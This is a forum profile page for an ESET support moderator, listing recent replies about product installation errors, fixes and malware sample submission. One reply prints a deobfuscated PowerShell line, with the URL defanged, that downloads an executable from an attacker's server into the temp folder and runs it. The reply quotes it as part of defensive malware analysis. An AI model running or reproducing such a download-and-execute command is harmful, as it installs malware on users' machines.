Jump to content

Peter Randziak

ESET Moderators
  • Content Count

  • Joined

  • Last visited

  • Days Won


Peter Randziak last won the day on March 6

Peter Randziak had the most liked content!


Profile Information

  • Gender
    Not Telling
  • Location

Recent Profile Visitors

7,012 profile views
  1. Hello @Miko Levy, yes, sure the process is well described in our KB at https://support.eset.com/kb141/?locale=en_US&viewlocale=en_US Thank you in advance for your future submissions ;-), P.R.
  2. Hello guys, can you please try to rename eguiActivation.dll to eguiActivation.dll.old in the Safe mode and report back, if it helps? The default path to it is C:\Program Files\ESET\ESET Security\eguiActivation.dll Regards, P.R.
  3. Hello @T3chGuy007 thank you for providing us with the log We checked them and we found: MSI (s) (BC!EC) [08:06:18:420]: Creating MSIHANDLE (422) of type 790531 for thread 8172 ERROR: (preps) Preparing of service failed. So it seems that the agent cannot be stopped for some reason. Please try to install the stand-alone agent on the affected machine and 1. run the installation with lvx parameter 2. Capture the events in the system during the installation with Process monitor with advanced output enabled, after it fails export the log in native pml format 3. Enable blocking of all blocked operations by HIPS in the HIPS setup on the Endpoint Compress the logs, upload them to a safe location and send me and TomasP a PM with download details so we can check it. Regards, P.R.
  4. One more update from the research team. It seems that the original script is base64 encoded and it is subject of our detection as PowerShell/TrojanDownloader.Agent.DV trojan since March 5. Regards, P.R.
  5. Hello @viper37, I got a response from the Dev team. The issue will be fixed in EES v. 7.1.2039 and EES v. 7.0.2108. Fixed build should be available within few weeks. We apologize for the inconvenience caused. Regards, P.R.
  6. Hello @pfnothing and @itman, I forwarded your findings to the lab. When it comes to the script extractions the numbers in {} are indexes to the array of chars in the quotation marks (-f "t","2"," …) @pfnothingI would be great if you can provide us with the script to analyze, ideally via a private message with a reference to this forum topic in an encrypted archive (set the password to infected so it won't be detected on his route to us 🙂 ) Thank you, P.R.
  7. I made the edit even in advance, not to share URL to malicious binary. I send it to samples@eset.com i.e. our research lab and I got this response :-) I'm a tech support guy, so I do not have a mastery in the black magic :-D Yes we tried to download it as well of course, but we didn't succeed either. It might be moved or the request might been filtered by some specific condition on the server. Or it just might got removed / moved by the server operators. I would check the detection logs,... Regards, P.R.
  8. Hello Emiel, glad to hear that, thank you for keeping us posted. P.R.
  9. Hello @T3chGuy007, So can you please provide us with it so we can check it? I found a similar case reported by our QA "Installation failed with error (package=0, error=8257588" ( reference for us P_ESMC-16163) but it should be fixed in the latest version of ESMC, but not sure if it requires the newest agent as well as you have the old one ESET Remote Administrator Agent 6.5.522.0 "This seems to be caused by policy having connection settings. The custom policy in setup causes those settings to be locked, and the ConfigSetServerConnection is trying to set the setting but it's locked by policy so it fails..." May I ask why do you upgrade via the All-in-one installer? I would recommend first to try to upgrade via the Upgrade infrastructure task, as All-in-one primary usage is for deployment, not for upgrading,... Regards, P.R.
  10. Hello @pfnothing after deobfuscation: (new-object System.Net.WebClient).DownloadFile('hXXp://services.enigmasolutions.xyz:2052/scg.exe', $env:TEMP + '\ASfkaop.exe');Start-Process($env:TEMP + '\ASfkaop.exe'); Do you happen to have the scg.exe left in the system? If no you can try to recover it. If yes can you please send me a copy of it in an encrypted archive via a private message to check? Regards, P.R.
  11. Hello @viper37, thank you for providing us with the dump and logs. I briefly checked them and opened a ticket with our dev team in order to investigate the root cause deeply. We will keep you posted. Regards, P.R. tracking note: P_EESW-3267
  12. @Supercows, good, expect a private message from me within few minutes. P.R.
  13. Dear @renekalff sure, I will send you a private message with details in a few moments. Regards, P.R.
  14. Hello @MarcFL congratulations to your new device. Can you please submit a ticket directly from your device for us so we can check the corresponding logs? Thank you, P.R.
  15. @Oliver Hansen, sure, I will contact you by private message in a few moments. Thank you, P.R.
  • Create New...